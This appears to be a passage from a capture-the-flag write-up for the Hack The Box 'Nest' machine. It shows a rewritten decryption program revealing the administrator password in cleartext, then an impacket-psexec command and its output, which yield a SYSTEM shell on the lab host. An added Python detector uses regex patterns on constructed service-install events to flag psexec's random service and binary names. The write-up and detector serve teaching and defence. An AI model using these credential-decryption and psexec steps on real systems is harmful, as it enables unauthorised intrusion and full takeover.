Decrypt Password


I was able to get some idea of how the program functions by checking it in dnSpy. Then I realized that the encryption/decryption mechanism used in the program, HqkLdap.exe, was not that different from that of Utils.vb from RUScanner earlier.

So I re-wrote the program and named it crypto.cs. It has already been compiled via mono on Kali and is ready for action.

┌──(kali㉿kali)-[~/…/htb/labs/nest/crypto]
└─$ ./crypto2.exe 
enter 1 to encrypt a string or 2 to decrypt a string:
2
enter a string to decrypt:
yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
decrypted string: XtH4nkS4Pl4y1nGX

Upon execution, crypto.cs printed out the decrypted string of the administrator's password hash, XtH4nkS4Pl4y1nGX.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/nest/crypto]
└─$ impacket-psexec administrator:XtH4nkS4Pl4y1nGX@$IP -target-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file dYtZRito.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service OpLU on 10.10.10.178.....
[*] Starting service OpLU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
HTB-NEST
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection 2:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::98c1:d5f4:5391:e244
   Link-local IPv6 Address . . . . . : fe80::98c1:d5f4:5391:e244%13
   IPv4 Address. . . . . . . . . . . : 10.10.10.178
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%13
                                       10.10.10.2
 
Tunnel adapter isatap.{FD41A009-A80D-4DE0-8775-B220067C038B}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
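
The psexec session above leaves a very recognisable trail on the target: a writable ADMIN$ share (which maps to the Windows directory), an uploaded executable with a random 8-letter name (dYtZRito.exe) and a freshly created service with a random 4-letter name (OpLU). The following is an added Python example for the defender's side, not part of the original writeup and not Impacket's code: it scans constructed Windows System log records modelled on Event ID 7045 ("a service was installed in the system") for exactly that naming pattern. The key=value record layout, the host name field and the sample lines are constructed for the example; the 4-letter/8-letter heuristic is taken from what the transcript shows.

```python
import re

# Constructed sample records in a simplified key=value layout modelled on
# Windows System log Event ID 7045 (service installed). Not a real export format.
SAMPLE_EVENTS = [
    "EventID=7045 Host=HTB-NEST ServiceName=OpLU ImagePath=%SystemRoot%\\dYtZRito.exe "
    "ServiceType=user-mode StartType=demand-start Account=LocalSystem",
    "EventID=7045 Host=HTB-NEST ServiceName=Spooler ImagePath=%SystemRoot%\\System32\\spoolsv.exe "
    "ServiceType=user-mode StartType=auto-start Account=LocalSystem",
    "EventID=7045 Host=HTB-NEST ServiceName=VendorUpdater ImagePath=C:\\ProgramData\\Vendor\\updater.exe "
    "ServiceType=user-mode StartType=auto-start Account=LocalSystem",
    "EventID=7036 Host=HTB-NEST ServiceName=OpLU State=running",
]

# Patterns derived from the naming seen in the transcript: a 4-letter service
# name and an 8-letter executable dropped directly into the Windows directory
# (the directory the ADMIN$ share exposes).
RANDOM_SERVICE = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\([A-Za-z]{8})\.exe$", re.IGNORECASE
)


def parse_event(line):
    """Split one constructed key=value record into a dict."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def is_psexec_like(ev):
    """True when a 7045 record carries both the random service name and the
    random binary in the Windows directory. Both signals are required: a
    4-letter name alone is too common (e.g. the legitimate "Dhcp" service)."""
    if ev.get("EventID") != "7045":
        return False
    name_random = RANDOM_SERVICE.match(ev.get("ServiceName", "")) is not None
    bin_random = RANDOM_BINARY.match(ev.get("ImagePath", "")) is not None
    return name_random and bin_random


def find_suspicious(lines):
    """Return (host, service name, image path) for each matching record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_psexec_like(ev):
            hits.append((ev.get("Host", "?"), ev["ServiceName"], ev["ImagePath"]))
    return hits


if __name__ == "__main__":
    for host, svc, path in find_suspicious(SAMPLE_EVENTS):
        print(f"[!] {host}: service {svc} installed from {path}")
```

Run against the constructed records, only the OpLU/dYtZRito.exe pair is reported; the Spooler and VendorUpdater installs pass because their image paths are not bare 8-letter executables in the Windows directory. In a real deployment the same two-signal rule would be applied to exported 7045 events and correlated with the preceding file write to ADMIN$.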

System Level Compromise